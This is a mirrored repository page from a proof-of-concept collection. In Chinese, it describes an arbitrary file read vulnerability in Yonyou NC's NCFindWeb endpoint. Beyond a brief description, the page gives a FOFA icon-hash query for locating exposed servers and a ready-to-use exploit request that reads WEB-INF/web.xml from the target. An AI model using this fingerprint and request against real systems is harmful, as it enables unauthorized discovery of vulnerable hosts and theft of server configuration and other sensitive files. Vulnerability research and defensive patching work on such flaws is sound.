admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/用友 NC NCFindWeb 任意文件读取漏洞.md
Threekiii 8b4e8ec87c OA产品漏洞
2022-02-21 09:35:01 +08:00

584 B
Raw Blame History

用友 NC NCFindWeb 任意文件读取漏洞

漏洞描述

用友NC存在任意文件读取漏洞攻击者通过漏洞可读取服务器敏感文件

漏洞影响

用友NC

FOFA

icon_hash="1085941792"

漏洞复现

登陆页面

img

验证POC /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml

img